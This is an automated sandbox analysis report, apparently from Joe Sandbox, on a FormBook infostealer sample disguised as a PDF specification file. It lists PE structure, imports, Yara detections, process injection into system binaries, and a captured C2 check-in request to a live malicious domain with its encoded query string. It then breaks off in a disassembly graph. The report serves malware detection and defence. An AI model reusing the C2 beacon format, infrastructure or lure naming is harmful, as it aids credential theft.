                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0xc40000x58efc0x59000e5502f904e4bab6f3de98da62304ddd0False0.9261982092696629data7.890376236144213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x11d0000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                    RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                    RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                    RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                    RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                    RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                    RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                    RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                    RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                    RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                    RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                    RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                    RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                    RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                    RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                    RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                    RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                    RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                    RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                    RT_RCDATA0xcc7b80x50202data1.0003382145925885
                                    RT_GROUP_ICON0x11c9bc0x76dataEnglishGreat Britain0.6610169491525424
                                    RT_GROUP_ICON0x11ca340x14dataEnglishGreat Britain1.25
                                    RT_GROUP_ICON0x11ca480x14dataEnglishGreat Britain1.15
                                    RT_GROUP_ICON0x11ca5c0x14dataEnglishGreat Britain1.25
                                    RT_VERSION0x11ca700xdcdataEnglishGreat Britain0.6181818181818182
                                    RT_MANIFEST0x11cb4c0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                    Imports

                                    DLLImport
                                    WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                    COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                    PSAPI.DLLGetProcessMemoryInfo
                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                    USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                    UxTheme.dllIsThemeActive
                                    KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                    USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                    GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                    ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                    OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishGreat Britain

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-12-05T15:21:49.570313+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049739172.67.134.4280TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 5, 2024 15:21:49.064372063 CET4973980192.168.11.20172.67.134.42
                                    Dec 5, 2024 15:21:49.188771963 CET8049739172.67.134.42192.168.11.20
                                    Dec 5, 2024 15:21:49.189018011 CET4973980192.168.11.20172.67.134.42
                                    Dec 5, 2024 15:21:49.191601992 CET4973980192.168.11.20172.67.134.42
                                    Dec 5, 2024 15:21:49.316037893 CET8049739172.67.134.42192.168.11.20
                                    Dec 5, 2024 15:21:49.569597006 CET8049739172.67.134.42192.168.11.20
                                    Dec 5, 2024 15:21:49.569647074 CET8049739172.67.134.42192.168.11.20
                                    Dec 5, 2024 15:21:49.569684029 CET8049739172.67.134.42192.168.11.20
                                    Dec 5, 2024 15:21:49.570312977 CET4973980192.168.11.20172.67.134.42
                                    Dec 5, 2024 15:21:49.570312977 CET4973980192.168.11.20172.67.134.42
                                    Dec 5, 2024 15:21:49.571197033 CET4973980192.168.11.20172.67.134.42
                                    Dec 5, 2024 15:21:49.695343018 CET8049739172.67.134.42192.168.11.20

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 5, 2024 15:21:48.897442102 CET5376153192.168.11.201.1.1.1
                                    Dec 5, 2024 15:21:49.060867071 CET53537611.1.1.1192.168.11.20

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 5, 2024 15:21:48.897442102 CET192.168.11.201.1.1.10x1bacStandard query (0)www.topkapiescortg.xyzA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 5, 2024 15:21:49.060867071 CET1.1.1.1192.168.11.200x1bacNo error (0)www.topkapiescortg.xyz172.67.134.42A (IP address)IN (0x0001)false
                                    Dec 5, 2024 15:21:49.060867071 CET1.1.1.1192.168.11.200x1bacNo error (0)www.topkapiescortg.xyz104.21.6.17A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • www.topkapiescortg.xyz

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.11.2049739172.67.134.42807548C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 5, 2024 15:21:49.191601992 CET480OUTGET /cz1i/?XV=QNGNUsgi9ans25&VT3s=lCWtxBlDPSCNJhRz7147v4YzJ6rIzSVGmK+Kme085vCDtUrqSJqQP+YtwYINSw3lRTDSNZCzyCPLZyeariLf2RdsyM6VIL0C/A8nWtsFZVjXlXjChXabsak= HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                    Accept-Language: en-US,en;q=0.9
                                    Host: www.topkapiescortg.xyz
                                    Connection: close
                                    User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                    Dec 5, 2024 15:21:49.569597006 CET1130INHTTP/1.1 404 Not Found
                                    Date: Thu, 05 Dec 2024 14:21:49 GMT
                                    Content-Type: text/html; charset=iso-8859-1
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gZH5wQpO6H194y%2BaZLyRpkLRI4RSMTwlhkgwSjKBdBM9q02tes%2FcoywC%2BSCIf%2FirNo%2FJkMTOUthCWHLX6lHxA73c4cH44sRjzMAa5b4iBJOWbQr1JtAlFNzad8h%2FEO%2FHT6EXLeqbxkXO"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8ed4af4eda1d3346-MIA
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=124553&min_rtt=124553&rtt_var=62276&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=480&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                    Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                    Dec 5, 2024 15:21:49.569647074 CET5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:09:20:50
                                    Start date:05/12/2024
                                    Path:C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe"
                                    Imagebase:0x340000
                                    File size:1'187'840 bytes
                                    MD5 hash:0F4C38F8DEF111C7FDB237B985C66CA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:09:20:51
                                    Start date:05/12/2024
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe"
                                    Imagebase:0x10000
                                    File size:47'016 bytes
                                    MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.6565186036.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.6571557042.0000000006630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:09:21:29
                                    Start date:05/12/2024
                                    Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                    Imagebase:0x140000000
                                    File size:16'696'840 bytes
                                    MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    General

                                    Target ID:3
                                    Start time:09:21:29
                                    Start date:05/12/2024
                                    Path:C:\Windows\SysWOW64\newdev.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\newdev.exe"
                                    Imagebase:0xd00000
                                    File size:67'584 bytes
                                    MD5 hash:775D479963E7ED5969665E44D8859438
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6805063902.0000000004830000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6804979638.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:09:21:54
                                    Start date:05/12/2024
                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                    Wow64 process (32bit):
                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                    Imagebase:
                                    File size:597'432 bytes
                                    MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:4.2%
                                      Dynamic/Decrypted Code Coverage:1.3%
                                      Signature Coverage:6.2%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:163
                                      execution_graph 92710 3b865b 92714 353b70 92710->92714 92712 3b8667 92713 353b70 331 API calls 92712->92713 92713->92712 92715 3542a5 92714->92715 92716 353bc8 92714->92716 92850 38cc5c 86 API calls 92715->92850 92717 353bef 92716->92717 92718 3b6fd1 92716->92718 92721 3b6f7e 92716->92721 92728 3b6f9b 92716->92728 92786 35f4ea 92717->92786 92827 39ceca 331 API calls 92718->92827 92720 353c18 92723 35f4ea 48 API calls 92720->92723 92721->92717 92724 3b6f87 92721->92724 92775 353c2c 92723->92775 92824 39d552 331 API calls 92724->92824 92725 3b6fbe 92826 38cc5c 86 API calls 92725->92826 92728->92725 92825 39da0e 331 API calls 92728->92825 92731 3b73b0 92731->92712 92732 3b737a 92856 38cc5c 86 API calls 92732->92856 92733 3b7297 92846 38cc5c 86 API calls 92733->92846 92737 35dce0 53 API calls 92737->92775 92739 3b707e 92828 38cc5c 86 API calls 92739->92828 92744 3540df 92847 38cc5c 86 API calls 92744->92847 92745 34d645 53 API calls 92745->92775 92748 3b72d2 92848 38cc5c 86 API calls 92748->92848 92749 34fe30 331 API calls 92749->92775 92751 3b7350 92854 38cc5c 86 API calls 92751->92854 92753 3b7363 92855 38cc5c 86 API calls 92753->92855 92755 3b72e9 92849 38cc5c 86 API calls 92755->92849 92756 3542f2 92857 38cc5c 86 API calls 92756->92857 92761 3b714c 92843 39ccdc 48 API calls 92761->92843 92762 35f4ea 48 API calls 92762->92775 92765 3b733f 92853 38cc5c 86 API calls 92765->92853 92766 353f2b 92766->92712 92768 34d286 48 API calls 92768->92775 92770 3b71a1 92845 35c15c 48 API calls 92770->92845 92771 346eed 48 API calls 92771->92775 92775->92715 92775->92732 92775->92733 92775->92737 92775->92739 92775->92744 92775->92745 92775->92748 92775->92749 92775->92751 92775->92753 92775->92755 92775->92756 92775->92761 92775->92762 92775->92765 92775->92766 92775->92768 92775->92771 92777 3b71e1 92775->92777 92795 34d9a0 53 API calls 92775->92795 92796 34d83d 53 API calls 92775->92796 92797 35ee75 92775->92797 92806 34cdb9 48 API calls 92775->92806 92807 34d6e9 92775->92807 92811 35c15c 48 API calls 92775->92811 92812 35c050 92775->92812 92823 35becb 331 API calls 92775->92823 92829 34dcae 50 API calls 92775->92829 92830 39ccdc 48 API calls 92775->92830 92831 38a1eb 50 API calls 92775->92831 92832 346a63 92775->92832 92777->92766 92852 38cc5c 86 API calls 92777->92852 92779 3b715f 92779->92770 92844 39ccdc 48 API calls 92779->92844 92780 3b71ce 92781 35c050 48 API calls 92780->92781 92783 3b71d6 92781->92783 92782 3b71ab 92782->92715 92782->92780 92783->92777 92784 3b7313 92783->92784 92851 38cc5c 86 API calls 92784->92851 92788 35f4f2 92786->92788 92789 35f50c 92788->92789 92790 35f50e 92788->92790 92858 36395c 92788->92858 92789->92720 92872 366805 RaiseException 92790->92872 92792 35f538 92873 36673b 47 API calls 92792->92873 92794 35f54a 92794->92720 92795->92775 92796->92775 92799 35f4ea 92797->92799 92798 36395c 47 API calls 92798->92799 92799->92798 92800 35f50c 92799->92800 92801 35f50e 92799->92801 92800->92775 92880 366805 RaiseException 92801->92880 92803 35f538 92881 36673b 47 API calls 92803->92881 92805 35f54a 92805->92775 92806->92775 92808 34d6f4 92807->92808 92809 34d71b 92808->92809 92882 34d764 55 API calls 92808->92882 92809->92775 92811->92775 92813 35c064 92812->92813 92815 35c069 92812->92815 92883 35c1af 48 API calls 92813->92883 92821 35c077 92815->92821 92884 35c15c 48 API calls 92815->92884 92817 35f4ea 48 API calls 92819 35c108 92817->92819 92818 35c152 92818->92775 92820 35f4ea 48 API calls 92819->92820 92822 35c113 92820->92822 92821->92817 92821->92818 92822->92775 92822->92822 92823->92775 92824->92766 92825->92725 92826->92718 92827->92775 92828->92766 92829->92775 92830->92775 92831->92775 92833 346adf 92832->92833 92836 346a6f 92832->92836 92889 34b18b 92833->92889 92835 346ab6 92835->92775 92837 346ad7 92836->92837 92838 346a8b 92836->92838 92888 34c369 48 API calls 92837->92888 92885 346b4a 92838->92885 92841 346a95 92842 35ee75 48 API calls 92841->92842 92842->92835 92843->92779 92844->92779 92845->92782 92846->92744 92847->92766 92848->92755 92849->92766 92850->92766 92851->92766 92852->92766 92853->92766 92854->92766 92855->92766 92856->92766 92857->92731 92859 3639d7 92858->92859 92864 363968 92858->92864 92879 367c0e 47 API calls 92859->92879 92862 36399b RtlAllocateHeap 92862->92864 92871 3639cf 92862->92871 92864->92862 92865 363973 92864->92865 92866 3639c3 92864->92866 92869 3639c1 92864->92869 92865->92864 92874 3681c2 47 API calls 92865->92874 92875 36821f 47 API calls 92865->92875 92876 361145 GetModuleHandleExW GetProcAddress ExitProcess 92865->92876 92877 367c0e 47 API calls 92866->92877 92878 367c0e 47 API calls 92869->92878 92871->92788 92872->92792 92873->92794 92874->92865 92875->92865 92877->92869 92878->92871 92879->92871 92880->92803 92881->92805 92882->92809 92883->92815 92884->92821 92886 35f4ea 48 API calls 92885->92886 92887 346b54 92886->92887 92887->92841 92888->92835 92890 34b1a2 92889->92890 92891 34b199 92889->92891 92890->92835 92891->92890 92893 34bdfa 92891->92893 92894 34be0d 92893->92894 92898 34be0a 92893->92898 92895 35f4ea 48 API calls 92894->92895 92896 34be17 92895->92896 92897 35ee75 48 API calls 92896->92897 92897->92898 92898->92890 92899 3b197b 92904 35dd94 92899->92904 92903 3b198a 92905 35f4ea 48 API calls 92904->92905 92906 35dd9c 92905->92906 92907 35ddb0 92906->92907 92912 35df3d 92906->92912 92911 